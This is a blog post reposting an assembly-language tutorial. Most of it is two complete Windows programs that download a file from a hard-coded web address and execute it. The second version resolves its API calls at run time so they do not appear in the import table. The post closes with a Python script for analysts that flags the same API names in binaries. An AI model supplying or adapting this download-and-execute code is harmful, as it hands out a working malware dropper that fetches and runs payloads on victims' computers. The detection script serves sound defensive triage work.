Thursday, May 25, 2017

ASM – Downloader

I found this nice piece of code on this website: http://wiremask.eu. Why is ASM so good? Well, first of all, it compiles into the smallest binaries you have ever seen.

“A new development tutorial has been added. It explains how to code a file downloader + executer in assembly language using FASM compiler.

Link to full tutorial : http://wiremask.eu/page.php?id=2

The first code is the most simple and clear file downloader, it shows how to use the Windows API, the compiled file size is 2KB.”

downexec.asm

format PE GUI 4.0
; ASM Downloader Tutorial
; Simple Version
; Download and Execute a File
; 2012 By Wiremask.eu

; Choose entry point
entry start
include 'include\win32a.inc'

; Declare constants
section '.data' data readable writeable
_file db 'file.htm',0
_url db 'http://wiremask.eu/',0

section '.code' code readable executable
; Entry point
start:
; Call download of _url
invoke URLDownloadToFile, 0, _url, _file, 0, 0
; Call execution of _file
invoke ShellExecute, 0, 0, _file, 0, 0, SW_SHOW
; Exit application
invoke ExitProcess, 0

; Declare API
section '.idata' import data readable
library kernel32,'kernel32.dll',\
        urlmon,'urlmon.dll',\
        shell32,'shell32.dll'
import kernel32,\
       ExitProcess,'ExitProcess'
import urlmon,\
       URLDownloadToFile,'URLDownloadToFileA'
import shell32,\
       ShellExecute,'ShellExecuteA'

The next code is a bit more complicated: it loads the APIs dynamically at runtime using GetProcAddress and LoadLibrary.

dyndownexec.asm

format PE GUI 4.0
; ASM Downloader Tutorial
; Advanced Version ( Dynamic )
; Download and Execute a File
; 2012 By Wiremask.eu

; Choose entry point
entry start
include 'include\win32a.inc'

; Declare constants
section '.data' data readable writeable
_urlmon db 'urlmon.dll',0
_shell db 'shell32.dll',0
_URLDownloadToFile db 'URLDownloadToFileA',0
_ShellExecute db 'ShellExecuteA',0
_url db 'http://wiremask.eu/',0
_file db 'file.htm',0

section '.code' code readable executable
start:
; Load urlmon.dll
invoke LoadLibrary, _urlmon
cmp eax, 0
je exit
; Keep the module handle in ebx (preserved across stdcall API calls);
; FreeLibrary needs this handle, not the function address
mov ebx, eax
; Get address of URLDownloadToFileA function
invoke GetProcAddress, ebx, _URLDownloadToFile
cmp eax, 0
je exit
; Set parameters of URLDownloadToFileA (pushed right to left)
push 0
push 0
push _file
push _url
push 0
; Call URLDownloadToFileA
call eax
; Free urlmon.dll
invoke FreeLibrary, ebx

; Load shell32.dll
invoke LoadLibrary, _shell
cmp eax, 0
je exit
; Keep the module handle for FreeLibrary
mov ebx, eax
; Get address of ShellExecute function
invoke GetProcAddress, ebx, _ShellExecute
cmp eax, 0
je exit
; Set parameters of ShellExecute (pushed right to left)
push SW_SHOW
push 0
push 0
push _file
push 0
push 0
; Call ShellExecute
call eax
; Free shell32.dll
invoke FreeLibrary, ebx

exit:
; Exit application
invoke ExitProcess, 0

; Declare API
section '.idata' import data readable
library kernel32,'kernel32.dll'
import kernel32,\
       ExitProcess,'ExitProcess',\
       LoadLibrary,'LoadLibraryA',\
       GetProcAddress,'GetProcAddress',\
       FreeLibrary,'FreeLibrary'
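
For analysts triaging a sample built like either listing, here is an added example (not part of the original post or the Wiremask tutorial): a string-level check for the download-and-execute API pair, which still matches the dynamic version because the names passed to GetProcAddress sit in .data as plain ASCII. The function name triage, the sample byte strings and the example.invalid URL are constructed for illustration, and the check does not parse the import table.

```python
import re

# NUL-terminated API names from the two listings above (A/W and Ex variants included).
API = re.compile(rb"(URLDownloadToFile|ShellExecute|LoadLibrary|GetProcAddress)(?:Ex)?[AW]?\x00")
ROLE = {b"URLDownloadToFile": "download", b"ShellExecute": "execute",
        b"LoadLibrary": "resolver", b"GetProcAddress": "resolver"}
# Printable run after the scheme; stops at the NUL that ends the C string.
URL = re.compile(rb"https?://[\x21-\x7e]+")


def triage(image: bytes) -> dict:
    """String-level triage of a PE image for the download-and-execute pattern."""
    apis, stems = {}, set()
    for m in API.finditer(image):
        stems.add(m.group(1))
        # Keep the first file offset of each name so an analyst can jump to it.
        apis.setdefault(ROLE[m.group(1)], {}).setdefault(m.group(0)[:-1].decode(), m.start())
    if "download" in apis and "execute" in apis:
        verdict = "download+execute"
    elif "download" in apis or "execute" in apis:
        verdict = "partial"
    else:
        verdict = "none"
    return {
        "verdict": verdict,
        "apis": apis,
        # GetProcAddress takes the export name as an ANSI string, so a name that is
        # resolved at run time is still stored in the file as plain ASCII.
        "resolver_pair": {b"LoadLibrary", b"GetProcAddress"} <= stems,
        "urls": sorted({u.decode() for u in URL.findall(image)}),
    }


# Constructed samples: string tables shaped like the two listings, not real binaries.
STATIC_SAMPLE = (b"MZ\x00\x00file.htm\x00http://example.invalid/\x00"
                 b"\x00\x00ExitProcess\x00\x00\x00URLDownloadToFileA\x00"
                 b"\x00\x00ShellExecuteA\x00kernel32.dll\x00urlmon.dll\x00shell32.dll\x00")
DYNAMIC_SAMPLE = (b"MZ\x00\x00urlmon.dll\x00shell32.dll\x00URLDownloadToFileA\x00"
                  b"ShellExecuteA\x00http://example.invalid/\x00file.htm\x00"
                  b"\x00\x00LoadLibraryA\x00\x00\x00GetProcAddress\x00kernel32.dll\x00")
BENIGN_SAMPLE = b"MZ\x00\x00\x00\x00ExitProcess\x00\x00\x00GetProcAddress\x00kernel32.dll\x00"

if __name__ == "__main__":
    for label, blob in (("static", STATIC_SAMPLE), ("dynamic", DYNAMIC_SAMPLE),
                        ("benign", BENIGN_SAMPLE)):
        print(label, triage(blob))
```

A "download+execute" verdict is a triage signal to look closer, not a conviction: legitimate updaters and installers use the same two APIs.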

About FastFlux

Owner of ZeroSecurity, interested in programming, malware analysis and penetration testing. If you would like to write for the ZeroSecurity team, please use the contact form above.
